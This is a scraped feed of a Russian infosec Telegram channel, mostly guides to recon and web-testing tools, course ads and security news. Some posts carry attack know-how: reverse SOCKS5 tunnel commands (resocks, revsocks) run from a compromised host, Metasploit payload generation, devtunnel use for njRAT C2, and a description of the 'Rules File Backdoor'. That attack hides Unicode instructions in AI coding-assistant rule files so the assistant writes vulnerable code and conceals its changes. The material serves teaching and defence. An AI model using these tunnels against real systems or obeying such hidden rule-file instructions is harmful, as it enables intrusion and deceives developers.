codeby_sec | Unsorted

Telegram-канал codeby_sec - Codeby

34789

Крупнейшее ИБ сообщество ру-сегмента Чат: @codeby_one Форум: codeby.net Обучение: codeby.school Пентест: codeby.one CTF: codeby.games VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Номер заявления для регистрации канала в РКН: 5035340278

Subscribe to a channel

Codeby

dnsx - быстрый и универсальный набор инструментов DNS, предназначенный для запуска различных проверок с помощью библиотеки retryabledns. Он поддерживает запросы A, AAAA, CNAME, PTR, NS, MX, TXT, SRV, SOA, пользовательские резолверы, фильтрацию DNS по шаблонам, например shuffledns, и т. д.

Для успешной установки требуется go1.21. Для установки последней версии выполните следующую команду: go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest

☄️ Примеры использования:
Вывод А записей для заданного списка поддоменов:

subfinder -silent -d hackerone.com | dnsx -silent -a -resp


Проверка с помощью кода состояния DNS для заданного списка доменов:
subfinder -silent -d hackerone.com | dnsx -silent -rcode noerror,servfail,refused


Извлечение поддоменов из заданного сетевого диапазона с помощью PTR запроса:
echo 173.0.84.0/24 | dnsx -silent -resp-only -ptr


Перебор по поддоменам с использованием нескольких ключевых слов:
dnsx -silent -d domains.txt -w jira,grafana,jenkins


Перебор доменов со списком подставляемых слов:
dnsx -d google.FUZZ -w tld.txt -resp


Особенностью dnsx является его способность обрабатывать многоуровневые подстановочные знаки на основе DNS. Иногда все поддомены разрешаются в один IP, что приводит к большому количеству мусора в выводе. dnsx обрабатывает это следующим образом: он отслеживает, сколько поддоменов указывают на один IP-адрес, и если количество поддоменов превышает определённый порог, он итеративно проверяет подстановочные знаки на всех уровнях хостов для этого IP-адреса.

Читать полностью…

Codeby

🚩 HackerLab — 1 место в квалификации Standoff 15!

По итогам квалификационного этапа крупнейших киберучений Standoff 15, команда Hackerlab заняла первое место! За этим результатом — мощная связка: практикующие пентестеры компании Кодебай и разработчики заданий HackerLab.

Для команды это был дебют, и мы гордимся тем, что смогли сразу продемонстрировать высокий результат на уровне сильнейших участников.

➡️ Scoreboard

Впереди — финал Standoff 15. Не расслабляемся и двигаемся дальше!

Читать полностью…

Codeby

🌩 Как хакеры взламывают облака: от открытых S3 до взломанных Kubernetes

Облачные сервисы — удобно, но опасно. Каждый день хакеры находят открытые базы данных, крадут ключи API и получают полный контроль над Kubernetes. Подробнее в карточках.

Читать полностью…

Codeby

Скрытые профили, поддомены, старые коммиты — как найти то, что спрятано?

В новой статье из цикла "ШХ" разбираем три мощных инструмента для сбора информации:

1⃣ Amass — ищем поддомены и точки входа (пассивно/активно).
2⃣ youtube-handles-fuzz — проверяем YouTube-каналы по имени.
3⃣ OSGINT — вытягиваем данные GitHub-профилей (репы, PGP, почты).

Зачем это нужно?
🔸Анализ инфраструктуры сайта.
🔸Поиск целевых аккаунтов.
🔸Проверка цифрового следа.

Все методы — на основе открытых данных.

🔴 Читайте статью и пробуйте инструменты
🔴 Прокачайте скиллы по OSINT со скидкой 5% до 12 апреля. Подробности здесь

Читать полностью…

Codeby

📎 httpx — быстрый и универсальный набор инструментов для работы с HTTP, созданный для поддержки запуска разных запросов с использованием общедоступной библиотеки. Запросы — это специальные тесты или проверки для сбора информации о веб-серверах, URL-адресах или других элементах HTTP. Используется для эффективного выявления и анализа конфигураций веб-серверов, проверки HTTP-ответов и диагностики потенциальных уязвимостей или неправильных настроек.

💻 Для успешной установки требуется go1.21. Установка: go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest. Другой вариант:

git clone https://github.com/projectdiscovery/httpx.git; \
cd httpx/cmd/httpx; \
go build; \
mv httpx /usr/local/bin/; \
httpx -version;


💱 Примеры использования:
Перебор путей по нескольким URL-адресам, выявляя коды ответов и потенциально уязвимые или незащищённые конечные точки в веб-приложениях:
httpx -l urls.txt -path /v1/api -sc


Запуск httpx с флагом -probe для всех доменов в файле hosts.txt, чтобы получить URL-адреса с проверенным статусом:
httpx -list hosts.txt -silent -probe


Можно использовать httpx в сочетании с другими инструментами, такими как subfinder для определения активных веб-серверов, их технологий в различных поддоменах:
subfinder -d hackerone.com -silent| httpx -title -tech-detect -status-code


По умолчанию httpx использует схему HTTPS и переходит на HTTP только в том случае, если HTTPS недоступен. Флаг -no-fallback можно использовать для проверки и отображения результатов как HTTP, так и HTTPS.
В параметрах можно передавать хосты, URL-адреса и CIDR.

Читать полностью…

Codeby

«СёрчИнформ» приглашает ИБ-руководителей на закрытую межотраслевую конференцию.

24 апреля в Москве более 300 директоров по безопасности крупнейших финансовых, промышленных, нефтегазовых компаний, организаций из ритейла, строительной и транспортной отрасли соберутся на конференции «Про ИБ без воды: Практика. Тренды. Решения».

👉 В программе мероприятия 10 часов обмена опытом с профессионалами по информационной безопасности! Нетворкинг за ужином и тет-а-тет с регуляторами прилагаются.

Участие бесплатное, но по приглашению! Посмотреть программу, выбрать отрасль и отправить заявку на участие можно по ссылке.

Читать полностью…

Codeby

Steghide: Полное руководство по стеганографии в файлах

🔒 Steghide — инструмент стеганографии, скрывающий данные в файлах (изображения BMP, JPEG и аудио WAV, AU). Он использует шифрование Blowfish и MD5-хеширование паролей, обеспечивая безопасность. Псевдослучайное распределение скрытых битов делает его полезным в цифровой криминалистике.



📸 Установка Steghide (Kali Linux)
sudo apt install steghide

Эта команда установит Steghide вместе с необходимыми зависимостями, такими как libmcrypt4 и libmhash2.


📸 Основные команды Steghide
После установки вы можете использовать команду steghide --help, чтобы просмотреть доступные параметры:
steghide --help

Вывод команды предоставит информацию о доступных опциях, таких как embed для встраивания данных и extract для их извлечения.


📸 Примеры использования Steghide
Встраивание данных:
Предположим, у вас есть текстовый файл secret.txt, который вы хотите скрыть внутри изображения cover.jpg. Для этого выполните команду:
steghide embed -cf cover.jpg -ef secret.txt

Вас попросят ввести пароль, который будет использоваться для шифрования скрытых данных. После выполнения этой команды будет создан файл cover.jpg, содержащий скрытый текст из secret.txt.

Извлечение данных:
Чтобы извлечь скрытые данные из файла cover.jpg, выполните:
steghide extract -sf cover.jpg

Вас попросят ввести пароль, использованный при встраивании. После этого скрытый файл будет извлечен в текущую директорию.


🔥 Попробуйте сами!
1. Встраивание данных:
- Создайте текстовый файл message.txt с любым текстом (например, цитата, загадка или секретное послание).
- Скачайте любое изображение (например, image.jpg) для использования в качестве контейнера.
- Используя Steghide, выполните встраивание текста в изображение:
steghide embed -cf image.jpg -ef message.txt

- Задайте надежный пароль (например, длиной не менее 12 символов).

2. Извлечение данных:
- Отправьте файл image.jpg своим одногруппникам (или другу) с сообщением, что в нем содержится скрытый текст.
- Попросите их извлечь данные из файла с помощью команды:
steghide extract -sf image.jpg

При этом они должны использовать ваш пароль.

Читать полностью…

Codeby

OWASP Zed Attack Proxy (ZAP): Инструмент для анализа безопасности веб-приложений

⚡️ OWASP Zed Attack Proxy (ZAP) — это бесплатное решение для тестирования безопасности веб-приложений, созданное проектом OWASP (Open Web Application Security Project). Благодаря своей простоте и функциональности, ZAP подходит как для новичков, так и для опытных специалистов.


⚡️ Основные особенности
⚡️ Перехватывающий прокси - ZAP действует как посредник между браузером и веб-приложением. Он перехватывает весь трафик, позволяя его анализировать и изменять в реальном времени. Это особенно полезно для понимания внутреннего устройства приложений и выявления уязвимостей.

⚡️ Автоматическое сканирование - инструмент обнаруживает популярные уязвимости, такие как SQL-инъекции, XSS и другие. Этот процесс требует минимального участия пользователя, что экономит время.

⚡️ Пассивное сканирование - анализирует передаваемый трафик, не влияя на работу приложения. Такой подход позволяет найти потенциальные уязвимости без риска для системы.

⚡️ Ручное тестирование - включает функции краулера, фуззера и сканера портов. Эти инструменты помогают глубже изучить веб-приложение и протестировать его на устойчивость к атакам.

⚡️ Расширяемость - ZAP поддерживает установку плагинов, которые позволяют адаптировать инструмент под конкретные задачи или добавлять новые функции.


⚡️ Режимы работы
ZAP предлагает несколько режимов, подходящих для различных сценариев:
- Стандартный - обычное сканирование.
- Безопасный - исключает любые действия, которые могут навредить системе.
- Защищённый - имитация безопасных атак.
- Атакующий - агрессивный режим, направленный на выявление максимального числа уязвимостей.


⚡️ Простота использования
Интерфейс ZAP интуитивно понятен. Инструмент доступен для Windows, Linux, macOS, а также в виде контейнера Docker. Для macOS и Windows установка не требует сложной настройки, а в Linux потребуется предустановленная Java.


⚡️ Практика
⁃ Установите OWASP ZAP на свою операционную систему.
⁃ Настройте инструмент для работы в качестве прокси-сервера.
⁃ Проведите пассивное сканирование любого тестового сайта (например, OWASP Juice Shop).
⁃ Найдите хотя бы одну потенциальную уязвимость и сделайте её скриншот.

Читать полностью…

Codeby

🔎 Вакансия: Пентестер | Метаскан

Метаскан — разработчик облачного сканера для поиска уязвимостей.
Сканер — это ~300 серверов выполняющих 29 инструментов (ZAP, nuclei, NASL, hydra, patator, ffuf, Katana, сameradar и др.)
Среди клиентов — Сбербанк, ВТБ, Альфа-банк, Ростелеком, Wildberries, DNS и др.

Ищем инженеров в команды RedTeam и Пентеста

🔥 Чем предстоит заниматься?
Разведка: поддомены, ASN, расширение скоупа

Эксплуатация системных уязвимостей + работа с сетевыми пробами и скриптами (nmap-service-probes, NSE)

Эксплуатация веб уязвимостей

Брут, атаки на сетевое оборудование, IOT, вендорские решения

Отчёты и участие в разборе атак вместе с командой

🚀 Что нужно уметь?
✅ Linux на уровне администратора
✅ Опыт обнаружения уязвимостей: пентест, багхантинг, Red Team
✅ Сетевые технологии: TCP\IP, OSI, IP-маршрутизация, базовые протоколы (DNS, HTTP и др.)
✅ Знание инструментов: Burp, Zap, Ffuf, Dirsearch, Nuclei, Amass, Nmap
✅ Опыт написания скриптов (Python, Bash и др.)
✅ Английский на уровне чтения документации

➕ Будет плюсом: наличие CVE / БДУ, публикации, свой open-source, опыт в Red Team, знание Python / JS / C++ / Go. Понимание HADI / CustDev. Опыт администрирования CЗИ\Linux.

💰 Условия
💵 (200-600к) 200к + % от каждого проекта в котором вы участвуете (вилки различаются у RedTeam\Pentester, уточните подробности)
📅 31день отпуска +дополнительные оплачиваемые выходные
📚 Обучение (Linux, сети, ИБ) за наш счёт
💪 Компенсация спорта, английского, работы с психологом
🌍 Удаленка (Не рассматриваем совмещение\part time)

Готов поломать что-нибудь? Пишите в личку @ShurochkaTatur

Читать полностью…

Codeby

💡 discover - репозитория содержащий пользовательские bash скрипты, используемые для автоматизации различных задач тестирования на проникновение, включая разведку, сканирование, перечисление и создание вредоносной нагрузки с помощью Metasploit.

💻 Установка:

sudo git clone https://github.com/leebaird/discover /opt/discover/
cd /opt/discover/
./discover.sh

Перед использованием discover стоит выбрать вариант 15 для обновления ОС и установки различных инструментов.

🛞 Модули:

RECON
⏺️Domain - пассивный поиск и нахождение зарегистрированных доменов. Под капотом использует ARIN, DNSRecon, dnstwist, subfinder, sublist3r, theHarvester, Metasploit, Whois и др. Для получения максимальных результатов необходимо вставить API ключи от theHarvester в /home/kali/.theHarvester/api-keys.yaml.
⏺️Person - объединяет информацию с нескольких веб-сайтов.

SCANNING
⏺️Generate target list - используются различные инструменты: Angry IP Scanner, arp-scan, netdiscover и Nmap pingsweep.
⏺️CIDR, List, IP, Range, or URL - содержит опции внешнего и внутреннего сканирования. Используется nmap, вспомогательные модули Metasploit, enum4linux, smbclient и ike-scan.

WEB
⏺️Open multiple tabs in Firefox - открывает несколько вкладок в Firefox. Может понадобится к примеру для просмотра всех отчетов Nikto, открытия всех директорий из файла robot.txt, списка, содержащего несколько IP-адресов и/или URL-адресов.
⏺️Nikto - запуск нескольких экземпляров Nikto параллельно для сканирования веб-серверов на наличие различных проблем безопасности.
⏺️SSL - проверка наличия проблем с сертификатами. Использует sslscan, sslyze и Nmap для проверки проблем с сертификатами SSL/TLS.

MISC
⏺️Parse XML - преобразование разных XML в формат CSV.
⏺️Generate a malicious payload - выбор вредоносной полезной нагрузки из модулей Metasploit для удаленного соединения с машиной жертвы.
⏺️Start a Metasploit listener - различные модули Metasploit для запуска листенера.

Читать полностью…

Codeby

Wapiti - инструмент для тестирования безопасности веб-приложений

🦌 Wapiti — это инструмент для тестирования безопасности веб-приложений с открытым исходным кодом, написанный на Python. Он помогает выявлять уязвимости, такие как SQL-инъекции, XSS, проблемы с аутентификацией и конфиденциальностью.


🫎 Особенности Wapiti
- Командная строка - Wapiti использует командную строку для настройки и автоматизации тестов.
- Типы атак - проверяет уязвимости, такие как SQL-инъекции, XSS, LFI, RFI и другие.
- Отчеты - генерирует отчеты в форматах HTML, XML, JSON для анализа уязвимостей.
- Аутентификация - поддерживает сайты с аутентификацией, сессиями и куки.


🫎 Установка Wapiti
Для установки Wapiti достаточно выполнить несколько простых команд в терминале. Убедитесь, что у вас установлен Python 3.x, а также установите необходимые зависимости.

pip install wapiti3



🫎 Пример использования Wapiti
После установки Wapiti можно использовать команду для сканирования веб-сайта на наличие уязвимостей. Вот пример простого запуска сканера на URL:
wapiti http://example.com

Файл начнет сканирование сайта http://example.com на уязвимости, проверяя формы, ссылки и параметры URL.


🫎 Генерация отчетов
После завершения сканирования можно сгенерировать отчет. Например, для создания отчета в формате HTML используется команда:
wapiti -u http://example.com -o report.html

Wapiti создаст отчет в формате HTML, который можно просмотреть в браузере.

Читать полностью…

Codeby

🚩 Новые задания на платформе HackerLab!

🕵️ Категория ФорензикаСекреты Олега

🌍 Категория ВебДосье X

Приятного хакинга!

Читать полностью…

Codeby

🖥 6 способов защиты кода, о которых должен знать каждый разработчик

Тестирование безопасности — это не только сканеры и отчеты. В статье разбираем:
🔸 Тестирование на проникновение (пентест) прямо в процессе разработки
🔸 Как DAST и SAST находят разные классы уязвимостей
🔸 Фаззинг API - почему это must have для современных приложений
🔸 IAST — "золотая середина" между статикой и динамикой
🔸 Как APSM помогает поддерживать безопасность на постоянной основе

🔴Читать статью полностью
🔴Хотите больше практики? 65 реальных заданий по взлому — стартуем 3 апреля. Регистрация здесь.

🚀 Пишите @Codeby_Academy

Читать полностью…

Codeby

🤔 dnstwist

Инструмент предназначен для анализа предоставленного доменного имени с помощью алгоритмов фаззинга и позволяющий найти похожие домены, которые могут быть использованы в фишинговых атаках.

💻 Последнюю версию можно установить клонировав репозиторий:

git clone https://github.com/elceef/dnstwist.git
cd dnstwist
pip install .


😮 Использование:

Обычно генерируются тысячи комбинаций доменов, поэтому целесообразно отображать только те, которые зарегистрированы:
dnstwist --registered domain.name


С помощью аргумента --nameservers можно указать внешний DNS-сервер, который будет обрабатывать запросы.

Через аргумент --dictionary передается файл со словарем в случае, если результатов фаззинга не будет хватать.

Для проверки, существуют ли домены с другими TLD, необходимо предоставить файл со списком TLD:
dnstwist --tld dictionaries/common_tlds.dict domain.name


Кроме того, можно указывать необходимые алгоритмы фаззинга перечисляя их:
dnstwist --fuzzers "homoglyph,hyphenation" domain.name


Для простых перестановок без поиска DNS, используется аргумент --format list.

🚨Обнаружение фишинга:
Ручная проверка каждого доменного имени на предмет того, что оно ведёт на фишинговый сайт, может занять много времени. Для решения этой проблемы, dnstwist использует нечёткие хэши — концепция, которая позволяет сравнивать два входных параметра (HTML-код) и определять базовый уровень сходства и перцептивный хэш — отпечаток, полученный на основе визуальных характеристик изображения (скриншот веб-страницы).
dnstwist --lsh domain.name
dnstwist --phash domain.name

Читать полностью…

Codeby

🔽 dive 🐳

Инструмент для изучения образов Docker, содержимого слоёв и поиска способов уменьшить размер образа Docker/OCI.

💱 Установка:

DIVE_VERSION=$(curl -sL "https://api.github.com/repos/wagoodman/dive/releases/latest" | grep '"tag_name":' | sed -E 's/.*"v([^"]+)".*/\1/')
curl -OL https://github.com/wagoodman/dive/releases/download/v${DIVE_VERSION}/dive_${DIVE_VERSION}_linux_amd64.deb
sudo apt install ./dive_${DIVE_VERSION}_linux_amd64.deb


Для Windows можно использовать последнюю версию отсюда.

☄️ Основные возможности:
⏺️ Демонстрация содержимого изображения Docker в разбивке по слоям;
⏺️ Возможность видеть изменения в каждом слое;
⏺️ Оценка эффективного распределения места в образе;
⏺️ Быстрые циклы сборки / анализа засчёт возможности проведения сканирования при сборке образа.

🧐 Использование:
Для анализа образа Docker необходимо запустить инструмент и указать tag/id/digest:
dive <your-image-tag>


Также можно запустить инструмент непосредственно с помощью команды docker:
alias dive="docker run -ti --rm  -v /var/run/docker.sock:/var/run/docker.sock wagoodman/dive"
dive <your-image-tag>

# for example
dive nginx:latest


Или создать свой образ и сразу перейти к его анализу:
dive build -t <some-tag>

Читать полностью…

Codeby

Аналитики Silent Push обнаружили новую фишинговую кампанию, использующую атаку Browser-in-the-Browser и нацеленную на игроков в Counter-Strike 2. Эти атаки включают в себя поддельные, но реалистично выглядящие всплывающие окна браузера, которые служат убедительной приманкой, чтобы заставить жертв войти в систему.

🎯 Цель кампании — заставить пользователя чувствовать себя в безопасности, полагая, что всплывающие окна являются частью реальных сайтов. Как только потенциальная жертва пытается войти на поддельный портал Steam (который открывается в "новом браузере"), злоумышленник крадет учетные данные и, вероятно, пытается завладеть учетной записью для последующей перепродажи. Наряду с попытками скомпрометировать учётные записи игроков в Steam, часть тактики кампании также включает использование названий профессиональной киберспортивной команды Navi для повышения доверия пользователей.

🚨 В ходе атаки на видном месте фишингового сайта отображается URL-адрес реального ресурса (в данном случае Steam), что заставляет пользователя поверить, что это настоящее всплывающее окно для входа в систему. Злоумышленник, стоящий за этим, также пытается распространить свою фишинговую схему на YouTube.

💡 Данный тип атак был изучен изучен исследователями и некоторые из них даже опубликовали пример с открытым исходным кодом.

Атаки BitB наиболее убедительны для пользователей настольных компьютеров, так как всплывающие окна рассчитаны на просмотр в более высоком разрешении.

❗️Рекомендации:
⏺️Специалисты рекомендуют пользователям обращать внимание на поддельные URL-адреса во всплывающих окнах для входа в систему;
⏺️Если вы видите URL-адрес, всегда старайтесь перетащить это окно за пределы браузера, в котором находитесь. Это лучший способ легко убедиться, что всплывающее окно настоящее и, следовательно, URL-адрес в строке будет корректно отображать URL-адрес всплывающего окна.

Читать полностью…

Codeby

interactsh

Инструмент с открытым исходным кодом предназначенный для обнаружения Out-of-Band уязвимостей. Interactsh генерирует динамические URL-адреса, которые при запросе целевой системой инициируют обратный вызов на сервер. Эти вызовы можно отслеживать и анализировать для выявления потенциальных проблем безопасности.

👀 Компоненты:
🌟interactsh-client — генерирует уникальные URL-адреса и выполняет опрос для получения данных о взаимодействиях. Установка: go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
🌟interactsh-server — сервер, который фиксирует обратные вызовы от сгенерированных URL-адресов. Публичные серверы доступны по умолчанию (oast.pro и др.), но для стабильной работы рекомендуется использовать собственный сервер. Установка: go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-server@latest
🌟Interactsh-web — бесплатный веб-клиент с открытым исходным кодом, который отображает взаимодействия на удобной панели управления в браузере. Он использует локальное хранилище браузера для хранения и отображения всех входящих взаимодействий.

💥 Характеристики:
⏺️Обеспечивает взаимодействие с DNS/HTTP(S)/SMTP(S)/LDAP и др. протоколами;
⏺️Отображает взаимодействия с полезными нагрузками в реальном времени;
⏺️Интегрируется с OWASP ZAP, Burp;
⏺️Поддерживает фильтрацию, сопоставление и настройку вывода данных.

Примеры использования:
1️⃣ Базовый запуск: interactsh-client. Генерирует один URL и начинает опрос взаимодействий с интервалом 5 секунд.

2️⃣ Использование защищенного автономного сервера: interactsh-client -server hackwithautomation.com -token XXX.

3️⃣ С помощью флага -sf можно сохранять/считывать информацию о текущем сеансе из пользовательского файла, что полезно для возобновления того же сеанса для опроса взаимодействий даже после остановки или закрытия клиента: interactsh-client -sf interact.session.

Для работы требуется получить бесплатный API ключ, зарегистрировавшись на https://cloud.projectdiscovery.io. После этого передаем API ключ в интерактивном режиме: interactsh-client -auth.

Читать полностью…

Codeby

🚩 Новые задания на платформе HackerLab!

🔑 Категория КриптографияНапиши мне

🔎 Категория OSINTЭто легально?

Приятного хакинга!

Читать полностью…

Codeby

Друзья, напоминаем, на каких курсах начинается обучение в апреле ⤵️

Запись до конца дня:
🌟 Курс «Python для Пентестера»освоим парсинг, фаззинг, аргументы командной строки и другие инструменты.
🌟 Курс «Профессия пентестер»изучаем инструменты: сканеры, Bash-скрипты, пентест AD.

Запись до 13 апреля:
🌟Курс «Тестирование Веб-приложений на проникновение»изучаем пассивный и активный фаззинг, фингерпринт, уязвимости, пост-эксплуатацию и другие техники.

Старт 7 апреля:
🌟Курс «Основы программирования на Python»овладеем самым популярным ЯП за 2 месяца.

Старт 14 апреля:
🌟Курс «Django - разработка веб-приложений»разработаем с нуля сайты на Django, сверстаем интерфейсы, и создадим интеграцию с бэкендом приложения.

Старт 17 апреля:
🌟Курс «Специалист центра мониторинга инцидентов информационной безопасности (SOC)»рассмотрим тему администрирования средств защиты информации.

Старт 21 апреля:
🌟Курс «Устройства для тестирования на проникновение»изучим различные типы микроконтроллеров и микрокомпьютеров.
🌟Курс «Анализ защищенности приложений Андроид»изучим этапы создания мобильного приложения, приемы реверса и изменения кода и рассмотрим возможные уязвимости.
🌟Курс «Git. Система контроля версий» освоим продвинутую работу с системой контроля версий Git.

🔔 Запишитесь у нашего менеджера @Codeby_Academy 🚀 или узнайте подробности на сайте!

Читать полностью…

Codeby

▶️ Друзья, уже через час стартует бесплатный вебинар по пентесту веба, где мы разберем:
🔸 Поиск уязвимостей через фаззинг
🔸 Реальные SQL- и командные инъекции (с выводом RCE)
🔸 Эскалация привилегий после взлома
🔸 Разбор похожих задач из курсов WAPT и SQLiM

Вы еще успеваете присоединиться!
Через час — взломаем веб как профессионалы. 🔴 Регистрируйтесь здесь и получите ссылку на эфир в ответном письме.

🚀 По всем вопросам пишите @Codeby_Academy

Читать полностью…

Codeby

🔗 URLFinder — высокоскоростной инструмент для пассивного сбора URL-адресов, оптимизированный для эффективного поиска веб-ресурсов без активного сканирования.

Имеет тщательно подобранные пассивные источники для максимально полного обнаружения URL-адресов, поддерживает несколько выходных форматов (JSON, file, стандартный вывод), поддержка STDIN/ OUT для легкой интеграции в существующие рабочие процессы.

💻 Установка возможна одной командой go install -v github.com/projectdiscovery/urlfinder/cmd/urlfinder@latest

🖥 Примеры использования:
🌟 Базовое использование для перечисления URL-адреса целевого домена codeby.net:

urlfinder -d codeby.net


🌟 Включать URL-адреса, соответствующие определенным шаблонам:
urlfinder -d codeby.net -m threads,hack


🌟 Исключать URL-адреса, соответствующие определенным шаблонам:
urlfinder -d codeby.net -f nothack


Список шаблонов для сопоставления можно передавать через файлы. Также можно ограничивать скорость максимального количества HTTP-запросов в секунду, указывать только конкретные источники для поиска или наоборот исключать их и задавать конкретные URL-адреса для более точного поиска.

Читать полностью…

Codeby

Под руководством опытных кураторов вы поймете, как организовать мониторинг безопасности IT сегмента предприятия — какие процессы внедрить и как это сделать? 😎

🔴 Стартуем 17 апреля. Регистрация здесь.

На курсе вы изучите:
⭐️ Моделирование угроз безопасности информации
⭐️ Vulnerability Management, Threat Intelligence, Threat Hunting, Patch Management и Incident Response (IR) с помощью бесплатного ПО
⭐️ Администрирование СЗИ

Что вы получите?

🙂Готовность к современным угрозам и способность предотвращать материальный и репутационный ущерб
🙂Возможности трудоустройства/стажировки для лучших выпускников
🙂Сертификат/удостоверение о повышении квалификации

🚀 По всем вопросам пишите @Codeby_Academy

Читать полностью…

Codeby

Была обнаружена новая кампания с использованием трояна удалённого доступа Njrat, который использует службу Microsoft Dev Tunnels для связи с центром управления (C2). Этот сервис, предназначенный для помощи разработчикам безопасно предоставлять локальные сервисы в интернете для тестирования и отладки, используется злоумышленниками для установления скрытых соединений.

Microsoft Dev Tunnels предоставляет временные общедоступные или частные URL-адреса, которые сопоставляются с локальными службами, обходя брандмауэры и ограничения NAT, позволяя злоумышленникам создавать зашифрованные туннели, которые трудно обнаружить в обычном сетевом трафике. Эти функции, разработанные для упрощения безопасных процессов разработки, сделали сервис привлекательной целью для киберпреступников.

📦 Использование:
Прежде чем создать туннель разработки, сначала необходимо скачать и установить devtunnel средство CLI. Это можно сделать используя ссылки на прямую загрузку (Linux, Windows).

Чтобы запустить туннель разработки необходимо войти с помощью идентификатора Microsoft Entra, Майкрософт или учетной записи GitHub. Microsoft Dev Tunnels не поддерживают анонимное размещение туннелей. Для этого вводим команду:

devtunnel user login


После входа в систему запускаем локальный сервер, который будет передавать запросы, отправленные ему и размещаем туннель на этом же порту:
# Start a http server on port 8080
devtunnel echo http -p 8080
# Tunnel port 8080
devtunnel host -p 8080


Успешная host команда выводит на консоль сообщение следующего вида, где tunnel_id — идентификатор туннеля разработки, URL https://<tunnel_id>.usw2.devtunnels.ms:8080/ в этом примере используется для доступа к туннелю, а https:/<tunnel_id>-8080-inspect.usw2.devtunnels.ms/ для проверки трафика:
Connecting to host tunnel relay wss://usw2-data.rel.tunnels.api.visualstudio.com/api/v1/Host/Connect/<tunnel_id>
Hosting port 8080 at https://<tunnel_id>.usw2.devtunnels.ms:8080/, https://<tunnel_id>-8080.usw2.devtunnels.ms/ and inspect it at https:/<tunnel_id>-8080-inspect.usw2.devtunnels.ms/
Ready to accept connections for tunnel: <tunnel_id>


🛡 Для защиты от таких атак можно предложить:
⏺️ Блокировать запросы к доменам devtunnels.ms;
⏺️ Запретить несанкционированное использование Dev Tunnels в корпоративной среде с помощью GPO;
⏺️ Отслеживать процессы, в которых содержится *devtunnel*.

Читать полностью…

Codeby

📣 БЕСПЛАТНЫЙ ВЕБИНАР WAPT & SQLiM: взламываем веб как профессионалы

Настоящий пентест — это не только сканеры, но и глубокий анализ, ручная эксплуатация и работа с эксплоитами. Покажем на практике, как это делают эксперты!

Ждем вас 3 апреля 19:00 (МСК). Регистрация здесь.

Что разберём:
🔸 Поиск уязвимостей через фаззинг
🔸 Реальные SQL- и командные инъекции (с выводом RCE)
🔸 Эскалация привилегий после взлома
🔸 Разбор похожих задач из курсов WAPT и SQLiM

Бонусы для участников:
Доступ к записи
Чек-лист "ТОП-5 ошибок в пентесте веба"
Подарок для всех зрителей!

Спикер: Александр Медведев 😎
🔴 OSWE, OSCP, CWAPT, SQLIM и др., 3х-кратный победитель Standoff
🔴 Опыт в пентестах — 12+ лет

🚀 Трудности с регистрацией? Пишите @Codeby_Academy

Читать полностью…

Codeby

🟢 Как взламывают роутеры, Bluetooth и даже оперативку? Разбираем в карточках.

🔴На курсе «Устройства для тестирования на проникновение» разбираем аппаратные атаки, о которых не пишут в мануалах. Стартуем 21 апреля. Регистрация здесь.

Читать полностью…

Codeby

Исследователи Pillar Security обнаружили новый опасный вектор атаки на цепочки поставок Rules File Backdoor. Эта техника позволяет злоумышленникам незаметно компрометировать код, созданный ИИ, внедряя скрытые вредоносные инструкции в, казалось бы, безобидные файлы конфигурации, используемые Cursor и GitHub Copilot.

⚙️ В ходе атаки используется несколько технических механизмов:
🌟 Контекстная манипуляция: встраивание инструкций, которые выглядят как легитимные, но направляют ИИ на изменение поведения при генерации кода
🌟 Обфускация в Unicode: использование символов нулевой ширины, маркеров двунаправленного текста и других невидимых символов для сокрытия вредоносных инструкций
🌟 Семантическое похищение: использование понимания ИИ естественного языка с помощью тонких лингвистических шаблонов, которые перенаправляют генерацию кода на уязвимые реализации
🌟 Межагентная уязвимость: атака работает на разных помощниках по написанию кода на основе ИИ, что указывает на системную уязвимость

Особенно опасен этот бэкдор тем, что попадая в репозиторий проекта, он влияет на все последующие сеансы создания кода членами команды.

🧩 Детали атаки:
Создание вредоносного файла правил, который кажется безобидным для проверяющих специалистов, но на самом деле содержит невидимые Unicode символы, который полностью читаем моделями ИИ и скрывает в себе вредоносные инструкции. После создания необходимо добавить его в нужный репозиторий и ждать пока им воспользуются разработчики.

Полезная нагрузка использует повествовательную структуру, чтобы обойти этические ограничения ИИ, представив вредоносные действия как требование безопасности‍. В инструкциях ИИ прямо указано не упоминать об изменениях кода в своих ответах, чтобы удалить все логи из окна чата агента, которые могут вызвать подозрения у разработчика.

Читать полностью…

Codeby

🧦 resocks

Утилита, осуществляющая обратный/реверсивный прокси-туннель SOCKS5, который можно использовать для маршрутизации трафика через систему, к которой нельзя получить прямой доступ (например, из-за NAT). Канал защищён взаимно доверенным TLS с автоматически сгенерированными сертификатами на основе ключа подключения.

Актуальную версию можно скачать здесь.

Использование:

1⃣ Запускаем листенер в системе, которая служит точкой входа в туннель SOCKS5 (атакующая машина):

# Оn proxy entry point system with IP 1.2.3.4
resocks listen


2⃣ В устройстве находящемся за NAT (скомпрометированное устройство) запускаем утилиту и передаем ключ:
# Оn remote relay system with IP 10.0.0.1
resocks 1.2.3.4 --key $CONNECTION_KEY


3⃣ Теперь необходимо настроить использование локального сервера SOCKS5, там где запущен листенер и передать IP цели, доступ к которой требуется получить:
curl --proxy 'socks5://127.0.0.1:1080' 'http://10.0.0.2'


В сравнении с другими инструментами (сhisel, ligolo и т.д.) resocks выделяется благодаря акценту на взаимной аутентификации через mTLS и удобству использования.

Читать полностью…

Codeby

revsocks

Утилита, написанная на Go, которая реализует обратный SOCKS5 туннель с поддержкой SSL/TLS и прокси (без аутентификации прокси и с базовой/NTLM аутентификацией прокси. Поддерживается на всех ОС, есть поддержка туннелирования DNS, автоматическая генерация сертификата SSL / TLS, если не указано иное.

🚀 Установка:

# Build for Linux
git clone https://github.com/kost/revsocks
export GOPATH=~/go
go get github.com/hashicorp/yamux
go get github.com/armon/go-socks5
go get github.com/kost/go-ntlmssp
go build
go build -ldflags="-s -w" && upx --brute revsocks


⚙️ Принцип работы:
⏺️На сервере RevSocks запускается с параметром -listen, указывающим порт, на котором сервер будет принимать соединения от клиента и параметром -socks, задающим адрес SOCKS5-сервера (сервер ожидает входящего соединения от клиента и одновременно предоставляет SOCKS5-интерфейс для внешних подключений).
⏺️На клиенте инструмент запускается с параметром -connect, указывающим на адрес и порт сервера.
⏺️Клиент устанавливает исходящее TCP-соединение к серверу, которое мультиплексируется с помощью Yamux для обработки множества потоков.
